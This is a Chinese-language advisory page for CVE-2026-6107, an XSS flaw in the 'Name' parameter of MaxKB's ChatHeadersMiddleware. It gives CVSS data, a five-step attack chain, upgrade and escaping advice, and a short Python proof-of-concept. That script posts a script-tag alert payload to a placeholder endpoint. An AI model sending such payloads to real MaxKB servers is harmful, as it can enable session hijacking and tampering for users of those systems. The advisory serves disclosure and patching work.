CVE-2026-6107 MaxKB跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2026-6107

漏洞类型

跨站脚本 (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

1Panel-dev MaxKB

漏洞概述

1Panel-dev MaxKB 在 2.6.1 及之前的版本中存在安全漏洞。该漏洞源于组件 ChatHeadersMiddleware 对文件 `apps/common/middleware/chat_headers_middleware.py` 中部分处理逻辑的实现缺陷。攻击者可以通过操纵名为“Name”的参数来触发跨站脚本攻击（XSS）。由于CVSS评分为3.5，属于低危漏洞，但仍需管理员注意并及时修复，以防止潜在的恶意脚本执行。

技术细节

该漏洞位于 1Panel-dev MaxKB 的 `apps/common/middleware/chat_headers_middleware.py` 文件中，具体涉及 `ChatHeadersMiddleware` 组件的某些未知处理逻辑。漏洞产生的根本原因是对用户输入的“Name”参数缺乏足够的过滤或转义，导致攻击者能够注入恶意的 JavaScript 代码。根据 CVSS 向量分析，攻击复杂度低（AC:L），且需要低权限用户（PR:L）进行操作。虽然需要用户交互（UI:R），但攻击者可以通过构造特制的恶意链接或数据包，诱导受害者访问。一旦受害者触发该请求，恶意脚本将在受害者的浏览器中执行，可能导致窃取 Cookie、会话劫持或进行未授权操作。尽管机密性影响为无（C:N），但完整性影响为低（I:L），主要风险在于前端层面的数据篡改或钓鱼攻击。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的是 1Panel-dev MaxKB 且版本低于或等于 2.6.1。

STEP 2

构造载荷

攻击者针对 ChatHeadersMiddleware 组件中的 'Name' 参数构造包含恶意 JavaScript 代码的输入数据。

STEP 3

发送请求

攻击者利用低权限账户（PR:L）向目标服务器发送包含恶意载荷的请求。

STEP 4

诱导交互

由于需要用户交互（UI:R），攻击者诱导受害者访问包含恶意脚本的页面或点击特定链接。

STEP 5

执行攻击

受害者的浏览器解析未经过滤的响应，执行恶意脚本，可能导致客户端数据篡改或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-6107 PoC Concept
# Target: 1Panel-dev MaxKB <= 2.6.1
# Vulnerable Parameter: Name
# Description: Injecting XSS payload via the 'Name' argument in the ChatHeadersMiddleware.

target_url = "http://target-ip:port/api/vulnerable_endpoint" # Placeholder for the actual endpoint
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json"
}

# Malicious payload to test XSS
xss_payload = "<script>alert('CVE-2026-6107_XSS');</script>"

data = {
    "Name": xss_payload, # The vulnerable parameter mentioned in the description
    "OtherParam": "value"
}

try:
    response = requests.post(target_url, json=data, headers=headers, verify=False)
    if response.status_code == 200:
        print(f"[+] Request sent successfully. Check if the alert triggers.")
        print(f"[+] Response: {response.text[:200]}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

1Panel-dev MaxKB <= 2.6.1

防御指南

临时缓解措施

建议立即将 MaxKB 升级至 2.8.0 或更高版本。如果无法立即升级，应限制网络访问权限，仅允许可信用户访问，并对输入参数“Name”进行严格的过滤和转义处理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6107
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6107
3 Details https://www.cvedetails.com/cve/CVE-2026-6107/
4 VulDB https://vuldb.com/cve/CVE-2026-6107
5 Link https://github.com/1Panel-dev/MaxKB/
6 Link https://github.com/1Panel-dev/MaxKB/commit/026a2d623e2aa5efa67c4834651e79d5d7cab1da
7 Link https://github.com/1Panel-dev/MaxKB/pull/4919
8 Link https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0
9 Link https://github.com/AnalogyC0de/public_exp/issues/24
10 Link https://vuldb.com/submit/782263
11 Link https://vuldb.com/vuln/356966
12 Link https://vuldb.com/vuln/356966/cti